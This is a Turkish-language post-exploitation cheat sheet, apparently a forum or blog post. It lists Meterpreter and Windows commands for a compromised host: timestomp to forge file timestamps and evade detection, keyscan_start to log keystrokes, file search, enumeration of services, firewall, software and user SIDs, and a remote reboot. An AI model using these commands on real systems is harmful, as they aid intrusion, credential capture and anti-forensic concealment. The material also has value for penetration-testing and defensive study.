Post-exploitasyon aşamaları, bir sisteme yetkisiz erişim sağlandıktan sonra yapılan işlemleri içerir. Bu aşamanın önemli bir yönü, kanıtları yönetmek ve özellikle dosya özelliklerini ve sistem yapılandırmalarını değiştirerek tespiti önlemektir.
Dosya Zaman Damgalarını timestomp ile Yönetme
Amaç: Dosya zaman damgalarını değiştirerek erişim ve değişiklik faaliyetlerini gizlemek.
timestomp Secret.txt -vBu komut, Secret.txt dosyasının mevcut zaman damgalarını gösterir. -v seçeneği, ayrıntılı çıktıyı sağlar.
timestomp Secret.txt -m “02/11/2018 08:10:03”Bu komut, Secret.txt dosyasının değiştirilmiş zaman damgasını belirtilen tarih ve saate değiştirir. Erişim (-a), oluşturulma (-c), ve giriş değiştirme (-e) zaman damgalarını da benzer şekilde değiştirebilirsiniz.
timestomp Secret.txt -m "02/11/2018 08:10:03" -a "02/11/2018 08:10:03" -c "02/11/2018 08:10:03" -e "02/11/2018 08:10:03"
-m: Değiştirilmiş zaman damgası
-a: Erişim zaman damgası
-c: Oluşturulma zaman damgası
-e: Giriş değiştirilmiş zaman damgası
Dosya Arama ile search Komutu
Amaç: Sistemde belirli dosyaları bulmak.
search -f [Filename.extension]Bu komut, belirtilen isim ve uzantıya sahip dosyaları arar.
search -f Secret.txt
Klavye Girdilerini Kaydetme
Amaç: Hedef sistemden tüm klavye girişlerini yakalamak.
keyscan_start
Bu komut, hedef sistemden tüm klavye girişlerini kaydetmeye başlar.
keyscan_start
Gizli Özelliklere Sahip Dizinleri Görüntüleme
Amaç: Gizli özniteliklere sahip dizinleri almak.
dir /a:h
Bu komut, gizli özelliklere sahip dizinleri listeler.
dir /a:h
Hizmetleri Listeleme
Amaç: Sistemdeki mevcut hizmetleri listelemek.
sc queryex type=service state=all
Bu komut, tüm mevcut hizmetleri listeler.
sc queryex type=service state=all
Güvenlik Duvarı Durumunu Görüntüleme
Amaç: Sistemdeki güvenlik duvarı durumunu ve yapılandırmasını görüntülemek.
netsh firewall show state Güvenlik duvarı durumunu gösterir.
netsh firewall show config Güvenlik duvarı yapılandırmasını gösterir.
netsh firewall show state
netsh firewall show config
Yüklü Yazılımları Görüntüleme
Amaç: Sistemde kurulu yazılımların ayrıntılarını görüntülemek.
wmic /node:"" product get name,version,vendor
Bu komut, yüklü yazılımların adını, sürümünü ve sağlayıcısını gösterir.
wmic /node:"" product get name,version,vendor
Kullanıcı Bilgilerini Almak
Amaç: Kullanıcı adlarını ve SID'leri almak.
wmic useraccount get name,sid
Kullanıcı adlarını ve SID'leri listeler.
wmic useraccount get name,sid
Sistemi Yeniden Başlatma
Amaç: Hedef sistemi yeniden başlatmak.
wmic os where Primary='TRUE' reboot
Bu komut, hedef sistemi yeniden başlatır.
wmic os where Primary='TRUE' reboot
Elinize sağlık hocam.